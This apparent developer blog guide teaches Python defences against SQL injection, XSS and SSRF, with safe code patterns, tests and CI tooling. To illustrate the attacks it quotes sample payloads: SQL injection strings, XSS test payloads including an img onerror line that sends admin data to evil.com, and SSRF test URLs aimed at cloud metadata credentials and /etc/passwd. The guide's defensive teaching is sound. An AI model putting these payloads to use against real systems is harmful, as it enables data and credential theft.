I’ve been writing Python applications for over a decade, and I’ve seen every possible way to screw up security. The good news? Most Python security issues fall into predictable patterns that you can defend against systematically.
This guide covers the three vulnerabilities that keep showing up in my security reviews: SSRF, SQL injection, and XSS. Master these defenses, and you’ll stop 80% of the attacks before they start.
📊 OWASP 2025 Context: These vulnerabilities map directly to the OWASP Top 10 2025 - SSRF is now part of A01 Broken Access Control, injection dropped to A05 (thanks to better frameworks), while misconfigurations jumped to #2. Understanding the current threat landscape helps you prioritize your security efforts.
The Reality of Python Security
Here’s what I’ve learned from years of security incidents: developers don’t intentionally write vulnerable code. They just don’t realize that requests.get(user_input) or cursor.execute(f"SELECT * FROM users WHERE id={user_id}") are security disasters waiting to happen.
Python’s flexibility is also its weakness. The language lets you do almost anything, which means it’s easy to accidentally create attack vectors. Let’s fix that.
1. SQL Injection: The Classic That Never Dies
SQL injection should be extinct by now, but it remains one of the most common web vulnerabilities. I review Python apps where developers think f-strings make their code “more readable” - right up until someone dumps their entire user table.
How SQL Injection Actually Works
Let me show you exactly how this attack happens. Here’s vulnerable code I see constantly:
# NEVER DO THIS
def get_user_by_email(email):
    query = f"SELECT * FROM users WHERE email = '{email}'"
    cursor.execute(query)
    return cursor.fetchone()

# What happens with malicious input:
email = "admin@example.com' OR '1'='1' --"
# Resulting query: SELECT * FROM users WHERE email = 'admin@example.com' OR '1'='1' --'
# Result: Returns ALL users
The attacker just broke out of your string parameter and added their own SQL logic. Game over.
The Right Way: Parameterized Queries
Every Python database library supports parameterized queries. Use them religiously.
Raw psycopg2 (PostgreSQL)
import psycopg2

def get_user_by_email_safe(email):
    # The %s placeholder is safe - psycopg2 handles escaping
    cursor.execute("SELECT * FROM users WHERE email = %s", (email,))
    return cursor.fetchone()

def search_products(category, min_price, max_price):
    cursor.execute(
        "SELECT * FROM products WHERE category = %s AND price BETWEEN %s AND %s",
        (category, min_price, max_price)
    )
    return cursor.fetchall()
SQLite3
import sqlite3

def get_user_orders(user_id, status=None):
    if status:
        cursor.execute(
            "SELECT * FROM orders WHERE user_id = ? AND status = ?",
            (user_id, status)
        )
    else:
        cursor.execute(
            "SELECT * FROM orders WHERE user_id = ?",
            (user_id,)
        )
    return cursor.fetchall()
SQLAlchemy ORM (Recommended)
from sqlalchemy.orm import Session
from sqlalchemy import text

# ORM queries are automatically parameterized
def get_active_users_by_role(session: Session, role: str):
    return session.query(User).filter(
        User.role == role,
        User.is_active == True
    ).all()

# For complex raw SQL, use text() with bound parameters
def get_user_statistics(session: Session, start_date, end_date):
    result = session.execute(
        text("SELECT COUNT(*), AVG(age) FROM users WHERE created_at BETWEEN :start AND :end"),
        {"start": start_date, "end": end_date}
    )
    return result.fetchone()
Dynamic Queries: The Dangerous Zone
Sometimes you need dynamic table names, column names, or ORDER BY clauses. This is where most developers fall into the SQL injection trap.
Wrong Way (Vulnerable)
# DON'T DO THIS
def get_table_data(table_name, order_by):
    query = f"SELECT * FROM {table_name} ORDER BY {order_by}"
    cursor.execute(query)  # SQL injection waiting to happen
Right Way (Safe)
# Use allowlists for dynamic identifiers
ALLOWED_TABLES = {'users', 'products', 'orders'}
ALLOWED_SORT_COLUMNS = {
    'users': {'name', 'email', 'created_at'},
    'products': {'name', 'price', 'category'},
    'orders': {'total', 'created_at', 'status'}
}

def get_table_data(table_name, order_by='id'):
    if table_name not in ALLOWED_TABLES:
        raise ValueError(f"Invalid table: {table_name}")
    if order_by not in ALLOWED_SORT_COLUMNS.get(table_name, set()):
        order_by = 'id'  # Safe default
    # Now we can safely build the query
    query = f"SELECT * FROM {table_name} ORDER BY {order_by}"
    cursor.execute(query)
    return cursor.fetchall()
Django ORM: Built-in Protection
from django.db import models

# ORM queries are automatically safe
def get_user_posts(user_id, category=None):
    queryset = Post.objects.filter(author_id=user_id)
    if category:
        queryset = queryset.filter(category=category)
    return queryset

# For raw SQL, use params (.extra() is deprecated in modern Django;
# prefer .raw() with a params list for new code)
def get_complex_report(start_date, end_date):
    return Post.objects.extra(
        where=["created_at BETWEEN %s AND %s"],
        params=[start_date, end_date]
    )
Flask + SQLAlchemy: Practical Example
from flask import Flask, request, jsonify
from sqlalchemy import create_engine, text
from sqlalchemy.orm import sessionmaker

app = Flask(__name__)
Session = sessionmaker()

@app.route('/api/search')
def search_products():
    query = request.args.get('q', '')
    category = request.args.get('category')
    min_price = request.args.get('min_price', type=float)
    max_price = request.args.get('max_price', type=float)
    session = Session()
    try:
        # Build safe parameterized query
        sql = """
            SELECT id, name, price, category
            FROM products
            WHERE name ILIKE :query
        """
        params = {'query': f'%{query}%'}
        if category:
            sql += " AND category = :category"
            params['category'] = category
        if min_price is not None:
            sql += " AND price >= :min_price"
            params['min_price'] = min_price
        if max_price is not None:
            sql += " AND price <= :max_price"
            params['max_price'] = max_price
        result = session.execute(text(sql), params)
        products = [dict(row) for row in result.mappings()]
        return jsonify(products)
    finally:
        session.close()
Database-Level Protection
Code fixes aren’t enough. Set up database-level defenses too:
1. Least Privilege Database Users
import os

# Different database users for different operations
DATABASE_CONFIGS = {
    'read_only': {
        'host': 'db.example.com',
        'user': 'app_readonly',   # Can only SELECT
        'password': os.getenv('DB_READONLY_PASSWORD')
    },
    'read_write': {
        'host': 'db.example.com',
        'user': 'app_readwrite',  # Can SELECT, INSERT, UPDATE
        'password': os.getenv('DB_READWRITE_PASSWORD')
    }
}

# Use read-only connection for reports
def generate_report():
    with get_connection('read_only') as conn:
        # This connection can't modify data even if compromised
        return conn.execute("SELECT COUNT(*) FROM users").fetchone()
2. Database Configuration
-- PostgreSQL security settings
-- Limit how long any single statement can run
SET statement_timeout = '30s';
-- Create restricted user
CREATE USER app_readonly;
GRANT SELECT ON ALL TABLES IN SCHEMA public TO app_readonly;
GRANT USAGE ON SCHEMA public TO app_readonly;
-- No DDL permissions
REVOKE CREATE ON SCHEMA public FROM app_readonly;
Testing for SQL Injection
I always test my parameterized queries with malicious input to make sure they’re really safe:
import pytest

def test_user_search_sql_injection():
    # These should not break the query or return extra data
    malicious_inputs = [
        "' OR '1'='1",
        "'; DROP TABLE users; --",
        "' UNION SELECT password FROM users --",
        "admin'/**/OR/**/'1'='1",
        "' OR 1=1#"
    ]
    for malicious_input in malicious_inputs:
        # Should return empty result or specific user, never all users
        result = get_user_by_email(malicious_input)
        assert result is None or len(result) <= 1
Common SQL Injection Mistakes in Python
- Using % formatting: "SELECT * FROM users WHERE id = %s" % user_id - don’t do this!
- f-strings in SQL: f"SELECT * FROM {table} WHERE id = {user_id}" - also vulnerable!
- Building WHERE clauses: concatenating conditions instead of using parameterized queries
- LIKE queries: not escaping % and _ in user input for LIKE patterns
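The last point deserves a concrete illustration, since parameterization alone does not neutralize LIKE wildcards. A minimal sketch, assuming a psycopg2-style cursor and a hypothetical users table:

```python
def escape_like(term: str) -> str:
    """Escape LIKE wildcards so user input matches literally."""
    return (
        term.replace("\\", "\\\\")
            .replace("%", "\\%")
            .replace("_", "\\_")
    )

def search_users(cursor, term: str):
    # Parameterized AND wildcard-escaped; ESCAPE '\' tells SQL that
    # a backslash precedes a literal % or _
    pattern = f"%{escape_like(term)}%"
    cursor.execute(
        "SELECT * FROM users WHERE name LIKE %s ESCAPE '\\'",
        (pattern,),
    )
    return cursor.fetchall()
```

Without escaping, a search for "%" would match every row - not an injection, but an information-disclosure bug that parameterization alone does not fix.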
The Bottom Line on SQL Injection
Use parameterized queries for everything. No exceptions. If you need dynamic table or column names, use allowlists. Test with malicious input. Set up least-privilege database users.
SQL injection is 100% preventable, but only if you never, ever build SQL strings with user input.
2. Cross-Site Scripting (XSS): When User Input Becomes Code
XSS is sneaky because it often works perfectly in development. You type <script>alert('test')</script> into a form field, nothing happens, and you think you’re safe. Then someone tries <img src="x" onerror="fetch('/api/admin/users').then(r=>r.text()).then(data=>fetch('https://evil.com',{method:'POST',body:data}))"> and suddenly your admin data is being stolen.
Understanding the Three Types of XSS
1. Reflected XSS (Immediate)
User input is immediately reflected back in the response:
# Vulnerable Flask route
@app.route('/search')
def search():
    query = request.args.get('q', '')
    # This is dangerous!
    return f"<h1>Results for: {query}</h1><p>No results found.</p>"

# Attack: https://yoursite.com/search?q=<script>alert('XSS')</script>
2. Stored XSS (Persistent)
User input is saved to database and displayed later:
# Vulnerable comment system
def save_comment(user_id, content):
    # Stored without sanitization
    cursor.execute(
        "INSERT INTO comments (user_id, content) VALUES (%s, %s)",
        (user_id, content)
    )

def display_comments():
    comments = cursor.execute("SELECT content FROM comments").fetchall()
    # Dangerous! This executes any stored scripts
    return "".join(f"<div>{comment[0]}</div>" for comment in comments)
3. DOM-Based XSS (JavaScript)
Happens entirely in JavaScript, often in SPAs:
<!-- Vulnerable JavaScript -->
<script>
const params = new URLSearchParams(window.location.search);
document.getElementById('output').innerHTML = params.get('data'); // Dangerous!
</script>
Django: XSS Protection Done Right
Django’s template system auto-escapes everything by default. This is why Django apps rarely have XSS vulnerabilities:
# views.py
def user_profile(request, user_id):
    user = User.objects.get(id=user_id)
    return render(request, 'profile.html', {'user': user})

<!-- profile.html - Django template -->
<h1>Welcome, {{ user.name }}!</h1>  <!-- Automatically escaped! -->
<p>Bio: {{ user.bio }}</p>          <!-- Also escaped! -->
<!-- If user.name contains <script>alert('XSS')</script>,
     it renders as: &lt;script&gt;alert('XSS')&lt;/script&gt; -->
When you actually need HTML (rare!), sanitize it properly:
import bleach
from django.shortcuts import render
from django.utils.safestring import mark_safe

def render_user_content(request):
    user_html = request.POST.get('content')
    # Define allowed tags and attributes
    allowed_tags = ['p', 'br', 'strong', 'em', 'ul', 'ol', 'li', 'a']
    allowed_attributes = {'a': ['href', 'title']}
    # Sanitize the HTML
    clean_html = bleach.clean(
        user_html,
        tags=allowed_tags,
        attributes=allowed_attributes,
        strip=True
    )
    return render(request, 'content.html', {
        'content': mark_safe(clean_html)  # Safe to use mark_safe AFTER bleach
    })
Flask + Jinja2: Manual But Secure
Flask uses Jinja2, which also auto-escapes by default:
from flask import Flask, redirect, render_template_string, request
import bleach

app = Flask(__name__)

@app.route('/profile/<username>')
def user_profile(username):
    user = get_user(username)  # Your user lookup function
    # Jinja2 auto-escapes this
    template = """
    <h1>{{ user.name }}</h1>
    <p>Joined: {{ user.created_at }}</p>
    <p>Bio: {{ user.bio }}</p>
    """
    return render_template_string(template, user=user)

@app.route('/comment', methods=['POST'])
def add_comment():
    content = request.form.get('content')
    # For rich text, sanitize before storing
    clean_content = bleach.clean(
        content,
        tags=['p', 'br', 'b', 'i', 'u', 'a'],
        attributes={'a': ['href']},
        protocols=['http', 'https', 'mailto']
    )
    save_comment(request.user.id, clean_content)
    return redirect('/comments')
FastAPI: Modern Python Web Framework
from fastapi import FastAPI, Form, Request
from fastapi.templating import Jinja2Templates
from html import escape

app = FastAPI()
templates = Jinja2Templates(directory="templates")

@app.post("/submit-feedback")
async def submit_feedback(request: Request, message: str = Form(...)):
    # Manual escaping if needed (though templates auto-escape)
    safe_message = escape(message)
    return templates.TemplateResponse("feedback.html", {
        "request": request,
        "message": safe_message  # Safe to display
    })
JSON APIs and XSS
Even JSON APIs can be vulnerable if the frontend doesn’t handle data properly:
# Backend: Safe JSON response
@app.route('/api/user/<user_id>')
def get_user_api(user_id):
    user = get_user(user_id)
    return jsonify({
        'name': user.name,  # Will be JSON-encoded, safe in the response
        'bio': user.bio
    })

// Frontend: handling the JSON response
fetch('/api/user/123')
  .then(r => r.json())
  .then(data => {
    // DANGEROUS! Don't use innerHTML with user data
    document.getElementById('name').innerHTML = data.name;
    // SAFE: Use textContent instead
    document.getElementById('bio').textContent = data.bio;
  });
Content Security Policy (CSP) Implementation
CSP is your second line of defense. Even if XSS gets through, CSP can block it:
# Flask with CSP
from flask import Flask, render_template
from flask_talisman import Talisman

app = Flask(__name__)

# Configure CSP
csp = {
    'default-src': "'self'",
    'script-src': "'self'",                 # No inline scripts
    'style-src': "'self' 'unsafe-inline'",  # Allow inline CSS for now
    'img-src': "'self' data: https:",
    'font-src': "'self'",
    'connect-src': "'self'",
    'frame-ancestors': "'none'"
}
Talisman(app, content_security_policy=csp)

@app.route('/')
def home():
    return render_template('home.html')
For dynamic scripts, use nonces:
import secrets
from flask import g

@app.before_request
def generate_nonce():
    g.csp_nonce = secrets.token_urlsafe(16)

@app.after_request
def add_csp_header(response):
    csp = f"script-src 'self' 'nonce-{g.csp_nonce}'"
    response.headers['Content-Security-Policy'] = csp
    return response
<!-- Template with nonce -->
<script nonce="{{ g.csp_nonce }}">
// This script is allowed
console.log('Protected by CSP');
</script>
Real-World XSS Testing
I test every user input field with these payloads:
XSS_TEST_PAYLOADS = [
    "<script>alert('XSS')</script>",
    "<img src='x' onerror='alert(1)'>",
    "javascript:alert('XSS')",
    "<svg onload='alert(1)'>",
    "<<SCRIPT>alert('XSS');//<</SCRIPT>",
    "<script>fetch('/admin/users').then(r=>r.text()).then(console.log)</script>",
    "';alert(String.fromCharCode(88,83,83));//';alert(String.fromCharCode(88,83,83));//",
    "\";alert('XSS');//"
]

def test_xss_protection():
    for payload in XSS_TEST_PAYLOADS:
        response = client.post('/comment', data={'content': payload})
        body = response.data.decode()
        # Check for unescaped markup. Properly escaped output may still
        # contain the substring "alert(", so test for executable tags
        assert '<script>' not in body
        assert '<img' not in body
        assert '<svg' not in body
Framework Comparison: XSS Protection
| Framework | Auto-Escape | Manual Escape Function | CSP Helper |
|---|---|---|---|
| Django | ✅ Always | escape(), mark_safe() | django-csp |
| Flask/Jinja2 | ✅ Default | escape(), Markup() | Flask-Talisman |
| FastAPI | ✅ Via Jinja2 | html.escape() | Manual headers |
| Tornado | ✅ Default | escape.xhtml_escape() | Manual headers |
Common XSS Mistakes in Python
- Disabling auto-escape: don’t use {{ content|safe }} without sanitizing first
- Building HTML in Python: concatenating user data into HTML strings
- Trusting “internal” data: even admin-entered content should be escaped
- JSON in script tags: <script>var data = {{ json_data }};</script> without proper escaping
- Missing CSP: not implementing Content Security Policy as backup protection
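The JSON-in-script pitfall is worth a concrete fix: a payload containing </script> can terminate the block early even though the JSON itself is valid. A minimal sketch of one common mitigation, escaping the dangerous characters into \uXXXX sequences before embedding (the helper name is hypothetical):

```python
import json

def json_for_script(data) -> str:
    """Serialize data for embedding inside a <script> tag.

    Replacing < > & with \\uXXXX escapes keeps the output valid JSON
    (it parses back to the same values) while preventing a literal
    '</script>' in the data from closing the surrounding tag.
    """
    return (
        json.dumps(data)
        .replace("<", "\\u003c")
        .replace(">", "\\u003e")
        .replace("&", "\\u0026")
    )

# A '</script>' in the payload can no longer break out of the block
payload = {"name": "</script><script>alert(1)</script>"}
safe = json_for_script(payload)
assert "</script>" not in safe
```

Django’s json_script template tag and similar framework helpers implement the same idea, so prefer those when available.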
Advanced XSS Protection
For apps that need rich text editing:
import bleach
from bleach_allowlist import markdown_tags, markdown_attrs

def sanitize_markdown_html(content):
    """Safely allow Markdown-generated HTML"""
    return bleach.clean(
        content,
        tags=markdown_tags,
        attributes=markdown_attrs,
        strip=True
    )

def sanitize_user_html(content, strict=True):
    """Sanitize user-provided HTML content"""
    if strict:
        # For comments, profiles, etc.
        allowed_tags = ['p', 'br', 'b', 'i', 'u', 'a', 'ul', 'ol', 'li']
        allowed_attrs = {'a': ['href', 'title']}
    else:
        # For admin/trusted users - more permissive
        allowed_tags = markdown_tags + ['div', 'span', 'blockquote']
        allowed_attrs = markdown_attrs
    return bleach.clean(
        content,
        tags=allowed_tags,
        attributes=allowed_attrs,
        protocols=['http', 'https', 'mailto'],
        strip=True
    )
3. Server-Side Request Forgery (SSRF): When Your Server Becomes the Attack Vector
SSRF is the vulnerability that makes me lose sleep. It’s not just about accessing internal resources - modern SSRF can steal cloud credentials, scan internal networks, and pivot to other systems. I’ve seen a simple “fetch URL” feature turn into complete AWS account compromise.
How SSRF Actually Works
Your application makes HTTP requests based on user input. Seems harmless until someone submits http://169.254.169.254/latest/meta-data/iam/security-credentials/ and walks away with your AWS credentials.
# This innocent-looking code is an SSRF disaster
@app.route('/fetch-image', methods=['POST'])
def fetch_image():
    url = request.json.get('url')
    response = requests.get(url)  # DANGEROUS!
    # Process image...
    return process_image(response.content)

# Attacker payload:
# {"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/my-role"}
# Result: Your AWS credentials are now in the attacker's hands
Understanding the Attack Surface
SSRF attacks target these internal resources:
- Cloud metadata services - AWS/GCP/Azure credential theft
- Internal network services - admin panels, databases, message queues
- Local files - /etc/passwd and configuration files via file://
- Port scanning - discovery of internal network topology
Building SSRF-Safe URL Validation
Here’s the bulletproof URL validation I use in production:
import ipaddress
import socket
import urllib.parse
import requests
from typing import Optional, Set, Tuple

class SSRFProtection:
    def __init__(self):
        # Dangerous IP ranges to block
        self.blocked_networks = [
            ipaddress.ip_network("127.0.0.0/8"),     # Loopback
            ipaddress.ip_network("10.0.0.0/8"),      # Private Class A
            ipaddress.ip_network("172.16.0.0/12"),   # Private Class B
            ipaddress.ip_network("192.168.0.0/16"),  # Private Class C
            ipaddress.ip_network("169.254.0.0/16"),  # Link-local (AWS metadata)
            ipaddress.ip_network("224.0.0.0/4"),     # Multicast
            ipaddress.ip_network("240.0.0.0/4"),     # Reserved
            # IPv6 equivalents
            ipaddress.ip_network("::1/128"),         # IPv6 loopback
            ipaddress.ip_network("fc00::/7"),        # IPv6 private
            ipaddress.ip_network("fe80::/10"),       # IPv6 link-local
        ]
        # Only allow these schemes
        self.allowed_schemes = {'http', 'https'}

    def validate_url(self, url: str, allowed_hosts: Optional[Set[str]] = None) -> Tuple[bool, str]:
        """
        Validate URL for SSRF safety.
        Returns: (is_safe, error_message)
        """
        try:
            parsed = urllib.parse.urlparse(url)
        except Exception as e:
            return False, f"Invalid URL format: {e}"
        # Check scheme
        if parsed.scheme not in self.allowed_schemes:
            return False, f"Scheme '{parsed.scheme}' not allowed"
        # Check if hostname exists
        hostname = parsed.hostname
        if not hostname:
            return False, "Missing hostname"
        # Allowlist check (most secure)
        if allowed_hosts and hostname not in allowed_hosts:
            return False, f"Host '{hostname}' not in allowlist"
        # Resolve hostname to IP and check if it's dangerous
        try:
            # Get all IPs for this hostname
            addr_info = socket.getaddrinfo(hostname, None)
            for family, socktype, proto, canonname, sockaddr in addr_info:
                ip = ipaddress.ip_address(sockaddr[0])
                # Check against blocked networks
                for blocked_net in self.blocked_networks:
                    if ip in blocked_net:
                        return False, f"IP {ip} is in blocked range {blocked_net}"
                # Additional check for cloud metadata
                if str(ip) == "169.254.169.254":
                    return False, "Cloud metadata service access blocked"
        except socket.gaierror:
            return False, f"Cannot resolve hostname: {hostname}"
        except Exception as e:
            return False, f"DNS resolution error: {e}"
        return True, "OK"

# Usage example
ssrf_protection = SSRFProtection()

def safe_fetch(url: str, allowed_hosts: Optional[Set[str]] = None) -> requests.Response:
    """Fetch URL safely with SSRF protection."""
    is_safe, error = ssrf_protection.validate_url(url, allowed_hosts)
    if not is_safe:
        raise ValueError(f"SSRF protection: {error}")
    # Additional request safety
    response = requests.get(
        url,
        allow_redirects=False,  # Prevent redirect bypasses
        timeout=10,             # Prevent hanging
        stream=True,            # Don't load huge responses
        headers={'User-Agent': 'MyApp/1.0'}
    )
    # Check response size
    content_length = response.headers.get('content-length')
    if content_length and int(content_length) > 10 * 1024 * 1024:  # 10MB limit
        raise ValueError("Response too large")
    return response
Framework-Specific SSRF Protection
Flask Application
from flask import Flask, request, jsonify
import requests

app = Flask(__name__)
ssrf_guard = SSRFProtection()

@app.route('/api/fetch-content', methods=['POST'])
def fetch_content():
    url = request.json.get('url')
    if not url:
        return jsonify({'error': 'URL required'}), 400
    # Define allowed hosts for this endpoint
    allowed_hosts = {'api.github.com', 'api.twitter.com', 'httpbin.org'}
    try:
        response = safe_fetch(url, allowed_hosts)
        # Validate content type
        content_type = response.headers.get('content-type', '')
        if not content_type.startswith('application/json'):
            return jsonify({'error': 'Only JSON content allowed'}), 400
        return jsonify({
            'data': response.json(),
            'status_code': response.status_code
        })
    except ValueError as e:
        return jsonify({'error': str(e)}), 400
    except requests.RequestException as e:
        return jsonify({'error': f'Request failed: {e}'}), 502
Django Application
from django.http import JsonResponse
from django.views.decorators.csrf import csrf_exempt
from django.utils.decorators import method_decorator
from django.views.generic import View
import json

@method_decorator(csrf_exempt, name='dispatch')
class SafeProxyView(View):
    def post(self, request):
        try:
            data = json.loads(request.body)
            url = data.get('url')
            if not url:
                return JsonResponse({'error': 'URL required'}, status=400)
            # Allowlist for this specific use case
            allowed_hosts = {'api.example.com', 'cdn.trusted.com'}
            response = safe_fetch(url, allowed_hosts)
            return JsonResponse({
                'content': response.text[:1000],  # Limit response size
                'status': response.status_code,
                'content_type': response.headers.get('content-type')
            })
        except ValueError as e:
            return JsonResponse({'error': str(e)}, status=400)
        except Exception:
            return JsonResponse({'error': 'Request failed'}, status=502)
Advanced SSRF Attack Vectors
DNS Rebinding Attacks
Attackers can bypass IP validation using DNS:
import time
import urllib.parse

# Attack scenario:
# 1. evil.com initially resolves to 8.8.8.8 (passes validation)
# 2. Attacker changes DNS to point to 192.168.1.1
# 3. Your server re-resolves and accesses internal network

def dns_rebinding_protection(url: str, max_age_seconds: int = 300):
    """Narrow the DNS rebinding window by caching recent validations.

    Note: caching alone only shrinks the window. The robust fix is to
    resolve the hostname once, validate the IP, and connect directly
    to that IP while sending the original Host header.
    """
    hostname = urllib.parse.urlparse(url).hostname
    # Check if we recently validated this hostname
    # (`cache` is assumed to be your app's cache, e.g. Django's)
    cache_key = f"dns_validation:{hostname}"
    last_check = cache.get(cache_key)
    if last_check and time.time() - last_check < max_age_seconds:
        return True  # Recently validated, trust it
    # Re-validate the hostname
    is_safe, error = ssrf_protection.validate_url(url)
    if is_safe:
        cache.set(cache_key, time.time(), timeout=max_age_seconds)
    return is_safe
Protocol Smuggling
# Block dangerous protocols that can access local files or services
DANGEROUS_SCHEMES = {
    'file', 'ftp', 'gopher', 'dict', 'ldap', 'ldaps',
    'tftp', 'sftp', 'ssh', 'scp', 'telnet'
}

def validate_scheme(url: str) -> bool:
    scheme = urllib.parse.urlparse(url).scheme.lower()
    return scheme in {'http', 'https'} and scheme not in DANGEROUS_SCHEMES
Cloud Environment Protection
AWS-Specific Protections
def block_aws_metadata(ip_str: str) -> bool:
    """Block the AWS instance metadata service endpoints"""
    aws_metadata_ranges = [
        "169.254.169.254/32",  # IMDS IPv4 endpoint
        "fd00:ec2::254/128"    # IMDS IPv6 endpoint
    ]
    try:
        ip = ipaddress.ip_address(ip_str)
        for range_str in aws_metadata_ranges:
            if ip in ipaddress.ip_network(range_str):
                return True
    except ValueError:
        pass
    return False

# Require IMDSv2 tokens so metadata can't be read by a simple GET SSRF
def configure_imds_v2():
    """Configure EC2 to require IMDSv2 tokens"""
    import boto3
    ec2 = boto3.client('ec2')
    ec2.modify_instance_metadata_options(
        InstanceId='i-1234567890abcdef0',
        HttpTokens='required',       # Require IMDSv2 tokens
        HttpPutResponseHopLimit=1    # Prevent forwarding
    )
Network-Level Protection
# Example firewall rules to block SSRF at network level
def setup_network_protection():
    """Example iptables rules for SSRF protection"""
    rules = [
        # Block access to metadata service
        "iptables -A OUTPUT -d 169.254.169.254 -j REJECT",
        # Block private networks (adjust for your setup)
        "iptables -A OUTPUT -d 10.0.0.0/8 -j REJECT",
        "iptables -A OUTPUT -d 172.16.0.0/12 -j REJECT",
        "iptables -A OUTPUT -d 192.168.0.0/16 -j REJECT",
        # Allow specific external services only
        "iptables -I OUTPUT -d api.github.com -j ACCEPT",
        "iptables -I OUTPUT -d api.twitter.com -j ACCEPT",
    ]
    # Note: Apply these rules carefully in production!
    return rules
Testing Your SSRF Defenses
def test_ssrf_protection():
    """Comprehensive SSRF testing"""
    dangerous_urls = [
        # Local network access
        "http://127.0.0.1:22",
        "http://localhost:3306",
        "http://192.168.1.1/admin",
        # Cloud metadata
        "http://169.254.169.254/latest/meta-data/",
        "http://metadata.google.internal/",
        # Protocol smuggling
        "file:///etc/passwd",
        "ftp://internal.server/",
        "gopher://127.0.0.1:1234",
        # DNS tricks
        "http://127.0.0.1.nip.io/",  # Resolves to 127.0.0.1
        "http://2130706433/",        # 127.0.0.1 in decimal
        # IPv6 variants
        "http://[::1]/",
        "http://[::ffff:7f00:1]/",
    ]
    for url in dangerous_urls:
        try:
            response = safe_fetch(url)
            print(f"FAIL: {url} was allowed!")  # Should be blocked
        except ValueError as e:
            print(f"PASS: {url} blocked - {e}")
Production SSRF Monitoring
import logging
import time

def log_ssrf_attempt(url: str, user_id: str, error: str):
    """Log potential SSRF attempts for security monitoring"""
    logging.warning(
        "SSRF attempt blocked",
        extra={
            'security_event': 'ssrf_blocked',
            'url': url,
            'user_id': user_id,
            'error': error,
            'timestamp': time.time()
        }
    )
    # Could also send to SIEM, trigger alerts, etc.

# Use in your validation function
def safe_fetch_with_logging(url: str, user_id: str) -> requests.Response:
    is_safe, error = ssrf_protection.validate_url(url)
    if not is_safe:
        log_ssrf_attempt(url, user_id, error)
        raise ValueError(f"Request blocked: {error}")
    return requests.get(url, timeout=10, allow_redirects=False)
4. Python-Specific Security Patterns
Beyond the big three vulnerabilities, Python has its own security gotchas that can bite you.
Dangerous Deserialization
import pickle
import yaml
# NEVER DO THIS - pickle can execute arbitrary code
user_data = request.get_data()
obj = pickle.loads(user_data) # RCE vulnerability!
# SAFE: Use JSON or safe YAML
import json
data = json.loads(user_input) # Safe - can’t execute code
# For YAML, always use safe_load
data = yaml.safe_load(user_input) # Safe
data = yaml.load(user_input) # DANGEROUS!
Command Injection Prevention
import subprocess
from werkzeug.utils import secure_filename

# WRONG: Shell injection waiting to happen
filename = request.form.get('filename')
subprocess.run(f"convert {filename} output.jpg", shell=True)  # DANGEROUS!

# RIGHT: Use list format, no shell
filename = secure_filename(request.files['image'].filename)
subprocess.run([
    'convert',
    f'uploads/{filename}',
    'output.jpg'
], shell=False, timeout=30)
Secure File Upload Handling
import os
import uuid
from werkzeug.utils import secure_filename

UPLOAD_FOLDER = '/var/uploads'  # Outside web root!
ALLOWED_EXTENSIONS = {'png', 'jpg', 'jpeg', 'gif'}

def allowed_file(filename):
    return '.' in filename and \
        filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS

@app.route('/upload', methods=['POST'])
def upload_file():
    if 'file' not in request.files:
        return 'No file selected', 400
    file = request.files['file']
    if not allowed_file(file.filename):
        return 'File type not allowed', 400
    # Generate safe filename
    filename = secure_filename(file.filename)
    # Add random component to prevent collisions/enumeration
    safe_name = f"{uuid.uuid4()}_{filename}"
    file.save(os.path.join(UPLOAD_FOLDER, safe_name))
    return f'File uploaded: {safe_name}'
Secure Authentication & Sessions
import os
import bcrypt
from flask import Flask, session

app = Flask(__name__)
app.secret_key = os.environ['SECRET_KEY']  # Never hardcode!

# Configure secure session cookies
app.config.update(
    SESSION_COOKIE_SECURE=True,       # HTTPS only
    SESSION_COOKIE_HTTPONLY=True,     # No JavaScript access
    SESSION_COOKIE_SAMESITE='Strict'  # CSRF protection
)

def hash_password(password: str) -> str:
    """Hash password securely"""
    salt = bcrypt.gensalt()
    return bcrypt.hashpw(password.encode('utf-8'), salt).decode('utf-8')

def verify_password(password: str, hashed: str) -> bool:
    """Verify password against hash"""
    return bcrypt.checkpw(password.encode('utf-8'), hashed.encode('utf-8'))
5. Security Tooling & CI Integration
Security isn’t just about code - it’s about process. Integrate these tools into your development workflow:
Static Analysis with Bandit
# Install bandit
pip install bandit

# Basic scan
bandit -r myproject/

# Generate report
bandit -r myproject/ -f json -o security_report.json

# Custom config for your project
bandit -r myproject/ -c bandit.yaml

# bandit.yaml - customize for your needs
skips: ['B101']  # Skip assert usage warnings in tests
tests: ['B201', 'B301', 'B401', 'B501']  # Only run specific tests
Dependency Scanning
# Check for known vulnerabilities
pip install safety
safety check
# Or use pip-audit (newer, more maintained)
pip install pip-audit
pip-audit
# In requirements.txt, pin versions
requests==2.31.0 # Not requests>=2.0
Pre-commit Hooks
# .pre-commit-config.yaml
repos:
  - repo: https://github.com/psf/black
    rev: 23.3.0
    hooks:
      - id: black
  - repo: https://github.com/PyCQA/bandit
    rev: 1.7.5
    hooks:
      - id: bandit
        args: ['-c', 'bandit.yaml']
  - repo: https://github.com/pyupio/safety
    rev: 2.3.4
    hooks:
      - id: safety
Frequently Asked Questions
Is Django really more secure than Flask?
Django includes more security features by default (CSRF protection, SQL injection prevention, XSS auto-escaping), but a well-configured Flask app can be just as secure. The difference is that Django forces you to think about security from day one, while Flask gives you more rope to hang yourself with.
How do I know if my parameterized queries are really safe?
Test them! Try injecting SQL into your parameters. If get_user("'; DROP TABLE users; --") simply returns no match instead of deleting your database, you’re good. Also use tools like sqlmap to test your endpoints.
Should I sanitize input or output for XSS prevention?
Always sanitize on output, not input. Store the original user data and escape it when displaying. This way you can change escaping rules later without losing data. Input validation is for data integrity, output escaping is for security.
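The store-raw, escape-on-output pattern can be sketched in a few lines (the render_comment helper and its markup are hypothetical):

```python
from html import escape

def render_comment(raw_comment: str) -> str:
    """Escape stored user data at display time, not at save time."""
    # The original text stays intact in the database; only the
    # rendered output is escaped
    return f'<div class="comment">{escape(raw_comment)}</div>'

html_out = render_comment("<script>alert(1)</script>")
assert "&lt;script&gt;" in html_out  # markup neutralized at render time
```

Because the database still holds the original text, switching to a different escaping strategy (or a different output channel, such as JSON) later loses nothing.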
Can Content Security Policy completely prevent XSS?
CSP is extremely effective but not foolproof. It’s a defense-in-depth measure. You still need proper output encoding because CSP can have bypasses, especially with overly permissive policies.
What’s the most dangerous Python security mistake?
In my experience, it’s using requests.get(user_input) without validation. SSRF attacks can lead to complete infrastructure compromise, especially in cloud environments where you can steal credentials from metadata services.
How do I handle secrets in Python applications?
